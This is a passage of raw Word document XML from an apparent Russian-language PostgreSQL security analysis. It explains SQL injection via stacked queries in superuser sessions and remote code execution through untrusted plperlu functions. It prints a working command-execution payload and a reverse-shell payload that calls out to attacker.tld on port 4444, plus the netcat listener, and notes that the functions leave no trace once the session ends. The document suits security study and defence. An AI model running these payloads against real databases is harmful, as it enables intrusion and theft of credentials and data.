          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(text(query))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3248FA0D"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34AD9DD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь sink — сам SQL-console (admin tool с прямой передачей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Эквивалентный сценарий — SQLi через стакинг в любой endpoint, который использует superuser-сессию (типично — internal admin-tools, migration runners, monitoring agents). Конкатенация в endpoint типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/admin/users/{id}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f"SELECT … WHERE id={id}"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id = "1; CREATE FUNCTION …"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> даёт тот же результат при наличии stacked queries в драйвере (см. 3.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038C0D48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — sanity check через `id`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE63908" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Создать функцию, вызвать, прочитать вывод из HTTP-ответа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5126B262" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (вводится в SQL Console или подставляется через стакинг):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54964892" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION pg_temp.x() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246AE341" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plperlu AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D02C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  my $out = `id 2&gt;&amp;1`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297FDDFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return $out;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29740303" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A4443B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.x();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DA89D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (то же самое — payload и есть SQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E6C0FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION pg_temp.x() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4386997A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plperlu AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBAC8EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  my $out = `id 2&gt;&amp;1`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BAB2EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return $out;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126EA928" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C1775" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.x();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FCB89F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Функция создаётся в схеме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — temp-схема сессии, автоматически удаляется в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DISCONNECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Никаких следов в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после закрытия сессии. Возвращаемое значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uid=999(postgres) gid=999(postgres) groups=999(postgres)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) приходит в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result.all()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приложения, далее — в HTTP-ответ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4392C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — reverse-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E631FEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION pg_temp.rev() RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCCD17E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plperlu AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8D950E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  exec("bash -c 'bash -i &gt;&amp; /dev/tcp/attacker.tld/4444 0&gt;&amp;1'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119C2277" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE2E3AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.rev();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744569BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F68E91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC823EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># интерактивный shell, права — postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F16E701" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (а не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>system()</w:t>
      </w:r>
      <w:r>
        <w:t>) — заменяет текущий процесс backend-процессом shell-а; PostgreSQL-сессия зависнет, но shell живёт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8FC4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Произвольный Perl-код выполняется в адресном пространстве backend-процесса PostgreSQL под OS-пользователем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Возможности шире, чем у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: можно открывать файлы, делать сетевые соединения, читать env, мутировать переменные процесса, делать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fork()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Post-RCE — тот же набор, что в 3.7.1 (доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$PGDATA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, SSH-ключам, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E35E13"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plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (буква </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = untrusted) намеренно даёт полный доступ к Perl-runtime без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-sandbox. Это решение архитектора PostgreSQL: trusted-варианты языков (plperl, plpython3u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>в старых версиях</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) пытаются ограничить OS-API, untrusted-варианты — нет. Защита перенесена на уровень привилегий: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION LANGUAGE plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> требует superuser. Если злоумышленник уже superuser, ограничений никаких.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329CEBC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490DE1D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plperlu в стандартной поставке с PG 9.0+, поведение стабильное.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349E1048" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> может (а) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и (б) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION ... LANGUAGE plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. По умолчанию USAGE на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выдан только superuser-ам (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> row для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lanpltrusted = false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, доступ через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE37AD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> должно быть установлено (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION plperlu</w:t>
      </w:r>
      <w:r>
        <w:t>). Если не установлено — superuser ставит сам (тоже требует superuser).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB638A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS-зависимости:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на сервере должен быть Perl-runtime (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>perl</w:t>
      </w:r>
      <w:r>
        <w:t>) и postgresql-plperl пакет (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql-plperl-17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
